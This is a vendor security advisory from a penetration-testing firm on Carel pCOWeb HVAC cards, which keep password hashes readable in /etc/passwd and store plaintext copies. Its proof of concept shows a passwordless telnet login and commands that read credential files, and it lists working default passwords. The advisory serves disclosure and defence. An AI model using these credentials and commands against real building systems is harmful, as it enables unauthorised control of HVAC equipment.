Kontakt

Kontaktieren Sie uns gerne

+49 241 510081-0
kontakt@redteam-pentesting.de
Kontaktformular
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header

Unsafe Storage of Credentials in Carel pCOWeb HVAC

The Carel pCOWeb card stores password hashes in the file “/etc/passwd”, allowing privilege escalation by authenticated users. Additionally, plaintext copies of the passwords are stored.

Details

  • Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
  • Affected Versions: “A 1.4.11 - B 1.4.2”, possibly others
  • Fixed Versions: product obsolete
  • Vulnerability Type: Credential Disclosure / Privilege Escalation
  • Security Risk: low
  • Vendor URL: https://www.carel.com/product/pcoweb-card
  • Vendor Status: notified / product obsolete
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-013
  • Advisory Status: published
  • CVE: GENERIC-MAP-NOMATCH
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction

“The pCOWeb card is used to interface the pCO Sistema to networks that use the HVAC protocols based on the Ethernet physical standard, such as BACnet IP, Modbus TCP/IP and SNMP. The card also features an integrated Web-Server, which both contains the HTML pages relating to the specific application and allows a browser to be used for remote system management.” (from the vendor’s homepage)

It is used as an OEM module in several different HVAC systems and considered obsolete by the vendor.

More Details

The Carel pCOWeb interface provides user accounts with different levels of privileges. Despite the different privileges, other users, even the user nobody, are able to read the file “/etc/passwd” which contains the hashed passwords for all user accounts, especially those with more privileges. Additionally, a plaintext copy of all passwords is stored in the file /usr/local/root/flash/etc/sysconfig/userspwd, which is accessible from the web interface at the URL http://192.168.0.1/config/pw_changeusers.html This allows attackers with knowledge of one user account password to gain knowledge of the other accounts passwords, possibly gaining more privileges.

Proof of Concept

Apart from a web interface, the Carel pCOWeb card provides a telnet interface accessible using a variety of default passwords and, in some cases, the user “nobody” without password:

$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

Linux 2.4.21-rmk1 (pCOWeb) (ttya0)


pCOWeb login: nobody
No directory /var/lib/nobody!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[nobody@pCOWeb13:58:55 /]$ ls -la /etc/passwd
-rw-r--r--   1 root     root          317 Jan  1 00:00 /etc/passwd
[nobody@pCOWeb13:59:00 /]$ cat /etc/passwd
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash
[nobody@pCOWeb13:59:32 /]$ cat /usr/local/root/admin/.htpasswd
admin:7c3fxxrcHcwtc
[nobody@pCOWeb13:59:33 /]$

The following table lists the cleartext passwords for above password hashes:

username | password

root | froot httpadmin | fhttpadm carel | fcarel guest | fguest nobody | (none) admin | fadmin

The passwords for the useraccounts “root”, “httpadmin”, “carel” and “guest” are documented in section 9.7.2 of the user manual (https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0), warning users:

“it is important to set a password other than the default “froot” to
prevent potentially dangerous outside access.”

It is possible that these default credentials are covered in CVE-2019-13553. Depending on firmware version and/or OEM modifications, some versions additionally allow Telnet login without password with the username “nobody” while it is disabled for other versions.

The password for the web interface user “admin” is documented in section 9.2.1 of the user manual (https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0).

Additionally, some versions were seen with additional user credentials stored in the directory provided for OEM modifications of the web interface, such as the username “reserved” with the password “freserve” in “/usr/local/root/flash/http/reserved/.htpasswd”. Storing some of these passwords in plaintext is covered in CVE-2019-11369.

However, while the above passwords are stored in hashed form, the web interface at http://192.168.0.1/config/pw_changeusers.html shows them in plaintext. A file containing the plaintext passwords can be found in the filesystem:

[root@pCOWeb14:02:14 /]# cat /usr/local/root/flash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel

Workaround

Change all default passwords listed above and ensure the user “nobody” is disabled or has a password set. The Carel pCOWeb card should not be connected to networks accessible by untrusted users (compare advisory rt-sa-2019-014 (https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt)).

Fix

No updated firmware will be published for pCOWeb Cards, as they are obsolete since Dec 2017. A successor hardware with current firmware is available for OEM integrators.

Security Risk

Attackers with knowledge of one set of user credentials to a Carel pCOWeb card could use the password hashes accessible to all users in “/etc/passwd” or the plaintext copies of the passwords to gain different privileges. Due to the necessity of access to credentials, this is considered to pose a low risk only.

Timeline

  • 2019-07-17 Vulnerability identified
  • 2019-08-03 Customer approved disclosure to vendor
  • 2019-09-02 Vendor notified
  • 2019-09-09 Vendor did not respond as promised
  • 2019-09-17 Vendor could not be reached
  • 2019-09-18 Vendor could not be reached
  • 2019-09-18 Vendor could not be reached
  • 2019-10-28 Advisory published due to publication of CVE-2019-13553

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/